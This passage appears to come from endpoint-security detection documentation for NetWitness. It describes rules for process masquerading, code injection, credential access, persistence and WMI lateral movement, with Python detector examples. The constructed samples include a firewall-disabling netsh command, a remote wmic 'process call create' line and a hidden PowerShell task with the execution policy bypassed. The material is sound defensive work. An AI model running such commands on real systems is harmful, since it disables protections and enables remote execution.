Presence of unexpected svchost.exe arguments can indicate masquerading. A legitimate svchost.exe is started by services.exe with a -k <service group> argument (on current Windows versions often with -p and -s <service> as well); an instance launched without -k, or with a service group that does not exist, is likely a renamed or injected binary used to blend in or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected svchost arguments
Unexpected svchost.exe Parent (unexpected_svchost.exe_parent)
An svchost.exe whose parent is not services.exe can indicate masquerading: a malicious binary named after a core OS process, used to blend in, gain access to the system, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected svchost.exe parent
Unexpected taskhostw.exe Parent (unexpected_taskhostw.exe_parent)
A taskhostw.exe whose parent is not svchost.exe (the instance hosting the Task Scheduler service) can indicate masquerading: a malicious binary named after a core OS process, used to blend in, gain access to the system, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected taskhostw.exe parent
Unexpected wininit.exe Parent (unexpected_wininit.exe_parent)
A wininit.exe whose parent is not smss.exe can indicate masquerading: a malicious binary named after a core OS process, used to blend in, gain access to the system, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected wininit.exe parent
Unexpected winlogon.exe Parent (unexpected_winlogon.exe_parent)
A winlogon.exe whose parent is not smss.exe can indicate masquerading: a malicious binary named after a core OS process, used to blend in, gain access to the system, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected winlogon.exe parent
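The "Unexpected <process> Parent", "Unexpected ... Location" and "Unexpected Svchost Arguments" rules above all compare a process-start event against the normal Windows startup chain. The following Python is an added example, not RSA or NetWitness code: the expected parents, install locations and svchost.exe argument convention it encodes are general Windows facts rather than anything stated on this page, the event dictionaries and their field names (path, parent, cmdline) are constructed for illustration, and a default %SystemRoot% of C:\Windows is assumed.

```python
"""Core-process masquerading checks over constructed process-start events.
Added example; not RSA/NetWitness code."""
import ntpath

# Expected parent image name(s) for core Windows processes (lowercase).
# These are the well-known boot/session chains, not taken from the RSA page.
EXPECTED_PARENT = {
    "smss.exe": {"system", "smss.exe"},        # first instance is started by System
    "csrss.exe": {"smss.exe"},
    "wininit.exe": {"smss.exe"},
    "winlogon.exe": {"smss.exe"},
    "services.exe": {"wininit.exe"},
    "lsass.exe": {"wininit.exe"},
    "lsm.exe": {"wininit.exe"},                # Windows 7 / Server 2008 R2 only
    "svchost.exe": {"services.exe"},
    "msdtc.exe": {"services.exe"},
    "runtimebroker.exe": {"svchost.exe"},
    "taskhostw.exe": {"svchost.exe"},
    "explorer.exe": {"userinit.exe", "explorer.exe"},
}

WINDOWS_DIR = r"c:\windows"   # assumption: default %SystemRoot%
# Expected on-disk directory relative to WINDOWS_DIR; everything is in System32
# except explorer.exe, which lives directly in the Windows directory.
EXPECTED_SUBDIR = {name: "system32" for name in EXPECTED_PARENT}
EXPECTED_SUBDIR["explorer.exe"] = ""


def image_name(path):
    """Lowercase base name of a path; ntpath handles backslashes on any host."""
    return ntpath.basename(path).lower()


def expected_path(name):
    return ntpath.join(WINDOWS_DIR, EXPECTED_SUBDIR[name], name).lower()


def svchost_args_ok(cmdline):
    """svchost.exe is normally launched as 'svchost.exe -k <group> ...'.
    A missing -k, or -k with no group name, is the 'unexpected arguments' case."""
    tokens = cmdline.split()
    for i in range(1, len(tokens)):
        if tokens[i].lower() == "-k" and i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
            return True
    return False


def check_event(event):
    """Return the rule names one process-start event triggers (constructed dict
    with keys: path, parent, cmdline). Non-core processes trigger nothing."""
    name = image_name(event["path"])
    hits = []
    if name not in EXPECTED_PARENT:
        return hits
    if image_name(event["parent"]) not in EXPECTED_PARENT[name]:
        hits.append("unexpected %s parent" % name)
    if ntpath.normpath(event["path"]).lower() != expected_path(name):
        hits.append("unexpected %s source location" % ("explorer.exe" if name == "explorer.exe" else "os process"))
    if name == "svchost.exe" and not svchost_args_ok(event["cmdline"]):
        hits.append("unexpected svchost arguments")
    return hits


SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"path": r"C:\Windows\System32\svchost.exe", "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule"},
    {"path": r"C:\Users\bob\AppData\Local\Temp\lsass.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"lsass.exe"},
    {"path": r"C:\Windows\System32\svchost.exe", "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe"},
    {"path": r"C:\Windows\System32\csrss.exe", "parent": r"C:\Windows\System32\smss.exe",
     "cmdline": r"%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["path"], "->", check_event(ev) or "ok")
```

The second sample event trips two rules at once (wrong parent and wrong location); in practice that overlap is what separates a renamed malware binary from the occasional legitimate oddity such as a service-control tool restarting a process.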
Unknown Segment (unknown_segment)
The file contains a segment that is not recognized; it should be examined for malicious code injection.
Unsigned Copies Self (unsigned_copies_self)
A file copies itself, detected by matching checksums of the source and the written file. Worms self-replicate this way to spread infection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned copies self
Unsigned Creates Remote Thread (unsigned_creates_remote_thread)
A file that is unsigned or has an invalid signature is creating a thread in another process (the CreateRemoteThread injection primitive used for DLL and shellcode injection). Without valid digital signature validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = unsigned creates remote thread
* boc = unsigned creates remote thread
Unsigned Creates Remote Thread And File Hidden (unsigned_creates_remote_thread_and_file_hidden)
This rule returns any unsigned file with the hidden attribute that leverages the Windows API "CreateRemoteThread" functionality; the combination of a hidden file and remote thread creation is a stronger signal than either alone.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned creates remote thread and file hidden
Unsigned Cron Job (unsigned_cron_job)
The cron utility schedules jobs (commands or scripts) to run periodically. An unsigned binary launched from a cron job is a common persistence mechanism on Unix-like systems and should be examined.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned cron job
Unsigned Deletes Self (unsigned_deletes_self)
A file deletes itself, detected by checksum. Droppers commonly remove their original file after installing the payload to hinder forensic recovery and hide how the infection spread.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned deletes self
Unsigned Kext (unsigned_kext)
On macOS, kernel extensions (kexts) placed in the extensions folders (/Library/Extensions and /System/Library/Extensions) must be code-signed before the kernel will load them. An unsigned kext should be examined as possible malware, since a loaded kext runs with kernel privileges.
Unsigned Library In Suspicious Daemon (unsigned_library_in_suspicious_daemon)
This rule triggers on macOS when an unsigned library is found loaded into a suspicious daemon. Adversaries inject libraries into background processes such as daemons for persistence and evasion.

VERSIONS SUPPORTED
* NetWitness Platform 11.4 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = unsigned library in suspicious daemon
Unsigned Module In Signed Process (unsigned_module_in_signed_process)
All modules loaded into a signed process are expected to be signed as well. An unsigned module in a signed process may indicate process injection; malware commonly uses injection to run under a trusted process, from which persistence and other environment modifications can be made.
Unsigned Opens LSASS (unsigned_opens_lsass)
This rule returns any unsigned file that opens (obtains a handle to) the Windows OS process lsass.exe. Credential-theft tools read LSASS memory to recover cached credentials, so this activity can be indicative of a credential stealer. Signed security and backup agents that legitimately open LSASS do not match the unsigned condition.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned opens lsass
Unsigned Reserved Name (unsigned_reserved_name)

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = unsigned reserved name
Unsigned Runs Python (unsigned_runs_python)
An unsigned process is running a Python interpreter or script.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned runs python
Unsigned Writes Executable (unsigned_writes_executable)
A file that is unsigned or has an invalid signature is writing an executable. Without valid digital signature validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes executable
Unsigned Writes Executable To AppDataLocal Directory (unsigned_writes_executable_to_appdatalocal_directory)
A file that is unsigned or has an invalid signature is writing an executable into a user's AppData\Local directory, a user-writable location favored by malware droppers. Without valid digital signature validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = unsigned writes executable to appdatalocal directory
* boc = unsigned writes executable to appdatalocal directory
Unsigned Writes Executable To AppDataRoaming Directory (unsigned_writes_executable_to_appdataroaming_directory)
A file that is unsigned or has an invalid signature is writing an executable into a user's AppData\Roaming directory, a user-writable location favored by malware droppers. Without valid digital signature validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = unsigned writes executable to appdataroaming directory
* boc = unsigned writes executable to appdataroaming directory
Unsigned Writes Executable To Library Application Support Directory (unsigned_writes_executable_to_library_application_support_directory)
A file that is unsigned or has an invalid signature is writing an executable into a Library/Application Support directory on macOS, a common home for third-party (and malicious) persistent components. Without valid digital signature validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes executable to library application support directory
Unsigned Writes Executable To Library Directory (unsigned_writes_executable_to_library_directory)
A file that is unsigned or has an invalid signature is writing an executable into a Library directory on macOS. Without valid digital signature validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes executable to library directory
Unsigned Writes Executable To Library Preferences Directory (unsigned_writes_executable_to_library_preferences_directory)
A file that is unsigned or has an invalid signature is writing an executable into a Library/Preferences directory on macOS, where executables do not normally belong. Without valid digital signature validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes executable to library preferences directory
Unsigned Writes Executable To Scripting Additions Directory (unsigned_writes_executable_to_scripting_additions_directory)
A file that is unsigned or has an invalid signature is writing an executable into a ScriptingAdditions directory on macOS; scripting additions (osax bundles) are loaded into applications and are a known injection and persistence path. Without valid digital signature validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes executable to scripting additions directory
Unsigned Writes Executable To System Directory (unsigned_writes_executable_to_system_directory)
A file that is unsigned or has an invalid signature is writing an executable into the operating system's system directory. Without valid digital signature validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes executable to system directory
Unsigned Writes Executable To Var Directory (unsigned_writes_executable_to_var_directory)
A file that is unsigned or has an invalid signature is writing an executable under /var (macOS/Unix). Without valid digital signature validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes executable to var directory
Unsigned Writes Executable To Windows Directory (unsigned_writes_executable_to_windows_directory)
A file that is unsigned or has an invalid signature is writing an executable into the Windows directory (%SystemRoot%). Without valid digital signature validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = unsigned writes executable to windows directory
* boc = unsigned writes executable to windows directory
Unsigned Writes To Autorun (unsigned_writes_to_autorun)
An unsigned process writes to an autostart (autorun) location, such as a Run registry key or the Startup folder; this is a common persistence technique.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes to autorun
Uses LibNSS (uses_libnss)
Network Security Services (NSS) is a set of libraries designed to support cross-platform development of security-enabled client and server applications. Credential stealers commonly load NSS (for example nss3) to decrypt the browser password stores that NSS protects, so an unexpected process linking it deserves a look.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = uses libnss
Uses LibPCAP (uses_libpcap)
libpcap provides packet capture; a process linking it may be intercepting network traffic to harvest credentials or perform reconnaissance. Legitimate capture and monitoring tools use it as well.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = uses libpcap
Uses Mach Injection (uses_mach_injection)
mach_inject is a C library that injects code into an arbitrary process on Mac OS X: the necessary code is copied into the target's address space and a new thread is created remotely to execute it.
Uses Mach Override (uses_mach_override)
mach_override is a C library that overrides one C function with another at runtime on Mac OS X (function hooking).
Warning On Post Redirect Disabled (warning_on_post_redirect_disabled)
Disabling the Internet Explorer warning shown when a form POST is redirected to another site (the WarnOnPostRedirect setting) can indicate an adversary attempting to block indicators or event notifications, cause events to go unreported, or hamper forensic analysis and incident response by removing the data needed to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = warning on post redirect disabled
Windows Firewall Disabled (windows_firewall_disabled)
Disabling the firewall (for example with netsh advfirewall set allprofiles state off) can indicate an attempt to undermine the security solution, cause events to go unreported, or hamper forensic analysis and incident response by removing the data needed to determine that an incident occurred.
Windows Task Runs Powershell (windows_task_runs_powershell)
A Windows scheduled task running PowerShell can indicate someone using task scheduling to execute programs at system startup or on a schedule for persistence, to conduct remote execution as part of lateral movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = windows task runs powershell
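The "Tasks In ProgramData Directory" rule earlier in this table and "Windows Task Runs Powershell" above both look at what a scheduled task actually executes. The following Python is an added example, not RSA or NetWitness code: it parses the task-definition XML that Windows stores under %SystemRoot%\System32\Tasks (the namespace is the real one, the two task documents are constructed for illustration, and the UTF-16 declaration real task files carry has been left off so the text parses as a Python string).

```python
"""Scheduled-task checks over constructed task XML. Added example; not RSA code."""
import ntpath
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
POWERSHELL = {"powershell", "pwsh", "powershell_ise"}


def image_name(command):
    """Base name of the command, lowercased, trailing .exe removed, so that
    'powershell' and '"C:\\...\\powershell.exe"' compare equal."""
    name = ntpath.basename(command.strip().strip('"')).lower()
    return name[:-4] if name.endswith(".exe") else name


def check_task(task_xml):
    """Return the rule names a task definition triggers, in a fixed order."""
    root = ET.fromstring(task_xml)
    runs_powershell = False
    in_programdata = False
    for action in root.findall(".//t:Exec", TASK_NS):
        command = action.findtext("t:Command", default="", namespaces=TASK_NS)
        arguments = action.findtext("t:Arguments", default="", namespaces=TASK_NS)
        if image_name(command) in POWERSHELL:
            runs_powershell = True
        # ProgramData is hidden by default; a task whose program or script
        # lives there is the 'tasks in programdata directory' case.
        text = (command + " " + arguments).lower()
        if "\\programdata\\" in text or "%programdata%" in text:
            in_programdata = True
    hits = []
    if runs_powershell:
        hits.append("windows task runs powershell")
    if in_programdata:
        hits.append("tasks in programdata directory")
    return hits


SUSPICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
      <Arguments>-NoP -W Hidden -ExecutionPolicy Bypass -File C:\ProgramData\.cache\sync.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""  # constructed

BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\system32\sc.exe</Command>
      <Arguments>start w32time task_started</Arguments>
    </Exec>
  </Actions>
</Task>"""  # constructed

if __name__ == "__main__":
    print(check_task(SUSPICIOUS_TASK_XML))
    print(check_task(BENIGN_TASK_XML))
```

Matching on the action's Command and Arguments rather than the task name matters: the task name is attacker-chosen and often mimics a vendor updater, whereas the executed command cannot be disguised without also changing what runs.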
Windows Update Disabled (windows_update_disabled)
Disabling Windows Update can indicate an attempt to undermine the security solution, keep the system unpatched, cause events to go unreported, or hamper forensic analysis and incident response by removing the data needed to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = windows update disabled
WMIC Remote Node Activity (wmic_remote_node_activity)
This rule returns instances of the Windows OS process wmic.exe being run with the /node parameter, which directs the query or action at a remote host. With valid credentials an attacker can use it to enumerate remote systems or, with process call create, to execute commands on them as part of lateral movement.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = wmic remote node activity
Wmiprvse Runs Command Shell (wmiprvse_runs_command_shell)
Windows Management Instrumentation (WMI) is a component of the Microsoft Windows operating system that provides management information and control in an enterprise environment. WmiPrvSE.exe (the WMI Provider Host) executes WMI requests, so a cmd.exe whose parent is WmiPrvSE.exe usually means a process was created through WMI (Win32_Process.Create), often from a remote host. This can indicate someone running malicious commands in cmd.exe to exploit the system, gain access, move laterally, or gain elevated privileges; attackers also use it to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = wmiprvse runs command shell
Wmiprvse Runs Powershell (wmiprvse_runs_powershell)
Common cyber criminals and targeted attackers heavily use PowerShell, as its flexibility makes it an ideal attack tool for Windows-based systems. PowerShell whose parent is WmiPrvSE.exe (the WMI Provider Host) usually means it was launched through WMI (Win32_Process.Create), often from a remote host, and can indicate someone trying to exploit the system, gain access, move laterally, or gain elevated privileges; attackers also use it to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = wmiprvse runs powershell
Wmiprvse Runs Scripting Engine (wmiprvse_runs_scripting_engine)
Windows Management Instrumentation (WMI) is a component of the Microsoft Windows operating system that provides management information and control in an enterprise environment. A scripting engine (such as cscript.exe or wscript.exe) whose parent is WmiPrvSE.exe usually means it was launched through WMI, often from a remote host, and can indicate someone running malicious scripts to exploit the system, gain access, move laterally, or gain elevated privileges; attackers also use it to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = wmiprvse runs scripting engine
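The "WMIC Remote Node Activity" rule and the three "Wmiprvse Runs ..." rules above are the two ends of the same WMI lateral-movement pattern: the /node command line on the source host and the WmiPrvSE.exe-parented child on the target. The following Python is an added example, not RSA or NetWitness code; the event dictionaries and their field names (path, parent, cmdline) are constructed for illustration, and the set of image names treated as scripting engines is this example's own choice.

```python
"""WMI lateral-movement checks over constructed process events. Added example;
not RSA/NetWitness code."""
import ntpath
import re

SCRIPT_ENGINES = {"cscript.exe", "wscript.exe"}   # example's choice of "scripting engine"
# /node:host, /node:host1,host2 and /node:"host1, host2" are all accepted by wmic.
NODE_RE = re.compile(r'/node:(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def image_name(path):
    return ntpath.basename(path).lower()


def wmic_remote_nodes(cmdline):
    """Return the hosts named by /node on a wmic command line (empty if none)."""
    nodes = []
    for match in NODE_RE.finditer(cmdline):
        raw = match.group(1) or match.group(2)
        nodes.extend(host.strip() for host in raw.split(",") if host.strip())
    return nodes


def wmiprvse_child_rule(event):
    """Map a child of WmiPrvSE.exe to the matching 'wmiprvse runs ...' rule."""
    if image_name(event["parent"]) != "wmiprvse.exe":
        return None
    child = image_name(event["path"])
    if child == "cmd.exe":
        return "wmiprvse runs command shell"
    if child in ("powershell.exe", "pwsh.exe"):
        return "wmiprvse runs powershell"
    if child in SCRIPT_ENGINES:
        return "wmiprvse runs scripting engine"
    return None


def evaluate(event):
    """Rule names triggered by one process-start event (constructed dict)."""
    hits = []
    if image_name(event["path"]) == "wmic.exe" and wmic_remote_nodes(event["cmdline"]):
        hits.append("wmic remote node activity")
    rule = wmiprvse_child_rule(event)
    if rule:
        hits.append(rule)
    return hits


SAMPLE_EVENTS = [  # constructed, not real telemetry
    # source host: attacker runs a command on a remote node through WMI
    {"path": r"C:\Windows\System32\wbem\wmic.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'wmic /node:"fileserver01" /user:corp\admin process call create "cmd /c whoami"'},
    # source host: local query, no /node, should not fire
    {"path": r"C:\Windows\System32\wbem\wmic.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"wmic os get caption"},
    # target host: the process created by Win32_Process.Create appears under WmiPrvSE.exe
    {"path": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"cmd /c whoami"},
    {"path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"powershell -NoProfile -Command Get-Process"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(image_name(ev["path"]), "->", evaluate(ev) or "ok")
```

Extracting the /node targets rather than just flagging the switch lets an analyst pivot immediately to the named hosts and look for the matching WmiPrvSE.exe child there.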
Writes Blacklisted File (writes_blacklisted_file)
An analyst may mark files as blacklisted within NetWitness Endpoint. If actions on an endpoint involve those blacklisted files being written, then this rule will trigger.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = writes blacklisted file
Writes Executable To Recycle Bin Directory (writes_executable_to_recycle_bin_directory)
Malware authors have used the technique of placing and running a malicious file out of the $RECYCLE.BIN folder on Windows systems. Adversaries use hidden locations like this anywhere on the system for persistence and to evade a typical user or system analysis that does not include hidden files.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = writes executable to recycle bin directory
Writes Executable To Root Of Logical Drive (writes_executable_to_root_of_logical_drive)
An executable is written to the root of a logical drive (for example C:\), where legitimate installers rarely place binaries. The written file should be examined, particularly when the writing process is unsigned or has an invalid signature, since without digital signature validation it should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = writes executable to root of logical drive
* boc = writes executable to root of logical drive
Writes Executable To Root Of Program Directory (writes_executable_to_root_of_program_directory)
An executable is written directly to the root of the program directory rather than into a vendor subfolder, where legitimate installers rarely place binaries. The written file should be examined, particularly when the writing process is unsigned or has an invalid signature, since without digital signature validation it should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = writes executable to root of program directory
* boc = writes executable to root of program directory
Writes Executable To Root Of Users Directory (writes_executable_to_root_of_users_directory)
An executable is written directly to the root of the Users directory rather than into a user profile, where legitimate software rarely places binaries. The written file should be examined, particularly when the writing process is unsigned or has an invalid signature, since without digital signature validation it should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = writes executable to root of users directory
* boc = writes executable to root of users directory
Writes Executable To System Volume Information Directory (writes_executable_to_system_volume_information_directory)

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = writes executable to system volume information directory
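The "Unsigned Writes Executable To ..." rules earlier in this table and the "Writes Executable To ..." rules above are one check applied to a list of suspicious target directories, with the signature state of the writing process deciding which rules need it to be unsigned. The following Python is an added example, not RSA or NetWitness code: it uses the file extension as a stand-in for the agent's executable detection (an assumption; a real agent inspects the file content), reads "Program directory" as Program Files and "System directory" as System32 (both assumptions), covers only the Windows locations, and the file paths are constructed.

```python
"""Classify a Windows file-write by target directory. Added example; not RSA code."""
import ntpath

# assumption: extension stands in for PE-header inspection
EXEC_EXT = {".exe", ".dll", ".sys", ".scr", ".com", ".ocx"}

# Rule names the page prefixes with "Unsigned": they fire only for an unsigned writer.
UNSIGNED_ONLY = {
    "appdatalocal directory", "appdataroaming directory",
    "system directory", "windows directory",
}


def location_class(path):
    """Map a Windows path to the location label used in the rule names, or None.
    Only lettered local drives are considered; UNC paths return None."""
    drive, rest = ntpath.splitdrive(ntpath.normpath(path.lower()))
    if not (len(drive) == 2 and drive[1] == ":"):
        return None
    parts = [p for p in rest.split("\\") if p]
    if not parts:
        return None
    dirs = parts[:-1]                      # directory components, lowercase
    if not dirs:
        return "root of logical drive"
    if dirs == ["users"]:
        return "root of users directory"
    if dirs in (["program files"], ["program files (x86)"]):   # assumption
        return "root of program directory"
    if dirs[0] == "$recycle.bin":
        return "recycle bin directory"
    if dirs[0] == "system volume information":
        return "system volume information directory"
    if len(dirs) >= 4 and dirs[0] == "users" and dirs[2] == "appdata":
        if dirs[3] == "local":
            return "appdatalocal directory"
        if dirs[3] == "roaming":
            return "appdataroaming directory"
    if dirs[:2] == ["windows", "system32"]:                   # assumption
        return "system directory"
    if dirs[0] == "windows":
        return "windows directory"
    return None


def classify_write(path, writer_signed):
    """Rule name for an executable written to `path` by a process whose
    signature state is `writer_signed`, or None when no rule applies."""
    if ntpath.splitext(path)[1].lower() not in EXEC_EXT:
        return None
    loc = location_class(path)
    if loc is None:
        return None
    if loc in UNSIGNED_ONLY:
        return None if writer_signed else "unsigned writes executable to " + loc
    return "writes executable to " + loc


SAMPLE_WRITES = [  # constructed (path, writer_signed)
    (r"C:\Users\bob\AppData\Local\Temp\update.exe", False),
    (r"C:\Users\bob\AppData\Roaming\svc.dll", False),
    (r"C:\Windows\System32\drivers\evil.sys", False),
    (r"C:\Windows\Temp\a.exe", True),
    (r"D:\payload.exe", True),
    (r"C:\$Recycle.Bin\S-1-5-21-1\run.exe", False),
    (r"C:\Program Files\Vendor\app.exe", True),
    (r"C:\Users\bob\Documents\report.docx", False),
]

if __name__ == "__main__":
    for path, signed in SAMPLE_WRITES:
        print(path, "->", classify_write(path, signed))
```

Checking the ordered System32 test before the general Windows-directory test is what keeps the two rules distinct; a flat substring match on "\windows\" would report every System32 write under the broader rule.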
Writes Graylisted File (writes_graylisted_file)
An analyst may mark files as graylisted within NetWitness Endpoint. If actions on an endpoint involve those graylisted files being written, then this rule will trigger.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = writes graylisted file
Writes Malicious File By Reputation Service (writes_malicious_file_by_reputation_service)
A file whose hash is tagged as malicious by the reputation service has been written to disk on the endpoint.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = writes malicious file by reputation service
Writes Suspicious File By Reputation Service (writes_suspicious_file_by_reputation_service)
A file whose hash is tagged as suspicious by the reputation service has been written to disk on the endpoint.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = writes suspicious file by reputation service
